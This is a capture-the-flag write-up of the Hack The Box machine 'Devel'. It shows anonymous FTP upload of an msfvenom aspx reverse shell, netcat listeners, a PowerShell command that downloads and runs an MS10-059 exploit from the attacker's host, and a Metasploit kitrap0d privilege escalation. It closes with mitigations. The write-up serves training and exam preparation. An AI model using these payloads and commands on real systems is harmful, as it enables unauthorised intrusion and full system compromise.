Hack the Box — Devel (1)

HTB is a platorm which provides a large amount of vulnerable virtual machines. The goal is to find vulnerabilities, elevate privileges and finally to find two flags — a user and a root flag. As I am planning to take the OSCP exam, my focus is to exploit some HTB machines as preparation.

As I tend to remember stuff easier, when writing them down, I decided to summarize the walkthroughs as documentation for later reference or anyone who is interested in this topic.

This is my first HTB writeup!

Summary

This machine has an anonymous FTP login, meaning that anyone with the username anonymous and any string as a password can login and access the files on the server. Allowing users to gain access from any part of the globe can be dangerous, if they in addition have write access it is even worse. Normally the anonymous user should have limited access rights and operation restrictions, which is not the case here. The anonymous user can upload any binary and execute it directly in the browser as the ftp root is equal to the \inetpub\wwwroot directory, which is the default folder for publishing web pages.

Furthermore, the machine has several Windows Kernel Vulnerabilities which allows to elevate privileges.

1. Reconnaissance

Enumeration

In order to identifiy vulnerabilities in order to proceed with exploitations, it is necessary to do a little bit of port scanning and to collect as much information as possible about the target network. I start with a Nmap scan to retrieve an overview of open ports and running services.

nmap -A -T4 10.10.10.5 -oX nmap/scan.xml --webxml

A: Enable OS detection, version detection, script scanning, and traceroute
-v: Increase verbosity level
-T4: Faster execution (default is T3)
-oX: Save output as xml

Scan Result

Nmap xml output

Open Ports Analysis

Port 80: Potentially risky methods/ Microsoft-IIS/7.5
I navigated to 10.10.10.5 and checked out the start page and the files mentioned in the above nmap result. I found nothing interesting in the HTML pages (iisstart.html is the starting page).

Port 21: Anonymous FTP allowed
This information from the nmap scan looks very promising. Anonymous FTP is allowed, which means, that anyone can log into the FTP Server with anonymous as user and any string as password to access the files. The ftp root directory shows a directory aspnet_client. This seems to be a default folder which is obsolete in .net 4.0.

The first step will be to test if file upload to the ftp server is possible. Given that this is the case we can upload a payload and try to execute it through the browser to get a shell.

2. Gain Access

1. Login as anonymous into the FTP Server.
2. Check out the directory structure and files. As outlined above, the files do not contain any helpful information.
3. Check if upload function works via put command. Create a simple txt file, upload it and try to access the file via 10.10.10.5/<filename>.txt. We see, that this is indeed sucessful. The next step is to upload the malicious payload.

ftp login and file upload

Now where we know that ftp login & upload is working, we can create our own reverse shell, upload it and execute it, in order to get access to the machine via a reverse shell to our attacker machine.

Reverse Shell

We can use msfvenom to create our custom payload for the exploit. For a clear understanding make sure to understand the various reverse shells available and to choose the right one. For example, select windows/meterpreter/reverse_tcp only if you use the Metasploit. Make sure to understand the difference between staged and unstaged payloads. In our case we use the non-meterpreter unstaged reverse shell payload windows/shell_reverse_tcp to generate the aspx payload. With this, we have the option to get a shell with a basic netcat listener. The staged version will not work with the netcat listener.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=5555 -f aspx > test.aspx

The listening host is the attacking machine (ip address |grep tun) and the port is the one we will listen on. We have created our backdoor executable binary. Upload this file as mentioned above to the FTP root directory.

ftp 10.10.10.5
...user -> anonymous 
put test.aspx

As we want to get a shell, we start a netcat listener on the attacking machine and visit 10.10.10.5/test.aspx.

nc -nlvp 5555

Low Privilege Shell

As soon as we visit the malicious URL 10.10.10.5/test.aspx the exploitation process starts. In the listener we can see, that we have a shell running as iis apppool\web.

low priv shell

Our next goal is to escalate our privileges. Windows Exploit Suggester is a tool which checks if public exploits are available for a specific machine. For this, I saved the output of systeminfo to a text file.

systeminfo output

3. Elavation of Privilege

We need to elevate the privileges into a system level user.

As mentioned I am using Windows Exploit Suggester to detect which public exploits exist. The only requirement to use this tool is the systeminfo command output from a Windows Machine. Before executing the below command make sure you have all relevant dependencies installed (as explained on their Github page).

./windows-exploit-suggester.py --database <xls file> --systeminfo systeminfo.txt

available exploits (E -> public Exploit; M -> Metasploit Module)

We are interested in the public exploits.

In order to make a quick decision which exploit to try, I chose one that is marked as public and listed here https://github.com/SecWiki/windows-kernel-exploits (they provide compiled versions). MS11–011 did not work, thus I used MS10–059, which worked like a charm. The description gives a good insight, if elevation of privilege is possible.

For this challenge I used the compiled version from this git repo.

Transfer File to victim machine

We have various ways to transfer the file to the victim machine. As we have a Target Machine with Windows OS, wget,nc,etc. are not recognized as an internal or external command.

Via Pythons’s Built-in HTTP Server

1. Get exploit binary from above mentioned source and save it locally. 
2. On attacking machine start the Http Server from where the file is located. Note, that default port is 8000 if nothing is stated.
  python -m SimpleHTTPServer 9005
3. On victim machine: 
  powershell -c "(new-object   System.Net.WebClient).DownloadFile('http://10.10.14.14:9005/Chimichurri.exe','c:/Users/Public/test.exe')"
4. Start a netcat listener locally
  nc -nlvp 4444 
5. Execute exploit binary on victim machine.
  test.exe 10.10.14.14 4444

Execution of exploit (MS10–059)

In the listener we can see, that we have a shell running as nt authority\system.

Via FTP

We can upload the exploit binary via FTP to the server and navigate to the respective folder on the victim machine.

1. Downlaod executable binary from above mentioned git repo.
2. Upload this file via FTP:
 ftp 10.10.10.5 
  - User: anonymous
  - Password: Any String
  - ftp> binary
  - ftp> put chimichurri.exxe
3. On victim machine navigate to: 
 c:\inetpub\wwwroot
4. Start a netcat listener on local machine
 nc -nlvp 4445
5. Execute binary on victim machine
 chimichurri.exe 10.10.14.14 4445

The \inetpub\wwwroot is the default directory for all web pages and content that is published on the web. \inetpub itself is the default folder for Microsoft Internet Information Services (IIS).

Flags

Now where we have escalated our privilege, we can access the root and user text files.

c:\>type c:\Users\Administrator\Desktop\root.txt.txt                
e621a.....72b4b
c:\>type c:\Users\babis\Desktop\user.txt.txt
9ecdd.....cb3e8

Metasploit

When ever possible I will focus to solve HTB Challenges without using Metasploit. This chapter is a quick step by step tutorial, in case someone is interesting to walk this through.

1. Use msfvenom to create Payload. Make sure to use the right payload (windows/meterpreter/reverse_tcp).
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.14 LPORT=4446 -f aspx -o test2.aspx
2. Upload test2.aspx file via FTP to server:
 ftp 10.10.10.5 
  - User: anonymous
  - Password: Any String
  - ftp> put test2.aspx
3. Start Metasploit
  - #msfconsole
   msf> use exploit/multi/handler
   msf> exploit(muliti/handler) 
      > set payload windows/meterpreter/reverse_tcp
   msf> set lhost 10.10.14.14
   msf> set lport 4446
   msf> run
4. Visit URL 10.10.10.5/test2.aspx
5. Meterpreter session
   [*] Started reverse TCP handler on 10.10.14.14:4446 
   [*] Sending stage (176195 bytes) to 10.10.10.5
   [*] Meterpreter session 1 opened (10.10.14.14:4446 -> ...)
4. msf> background
   msf> use post/multi/recon/local_exploit_suggester
   msf5 post(multi/recon/local_exploit_suggester) > set session 1
   msf5 post(multi/recon/local_exploit_suggester) > run

overview of available exploit modules

5. msf5 post(multi/recon/local_exploit_suggester) 
   > use exploit/windows/local/ms10_015_kitrap0d
   msf5 exploit(windows/local/ms10_015_kitrap0d) 
   > set session 1
   > set LHOST 10.10.14.14
   msf5 exploit(windows/local/ms10_015_kitrap0d) 
   > run

Metasploit exploit priv esc

Mitigation

• In order to secure the server from anonymous user login, anonymous login should not be allowed.
• If anonymous FTP is necessary, make sure, that only a small amount of people should be able to write to the server.
• FTP root should not be equal to the web server root (in case of IIS \inetpub\wwwroot directory)
• Update systems, when updates/patches are available. This mitigates the risk that a malicous actor uses a Windows kernel vulanerability to elevate priv.

Other WriteUps

Hack the Box — Servmon (2)
Hack the Box — Chatterbox (5)
Hack the Box — Jeeves(10)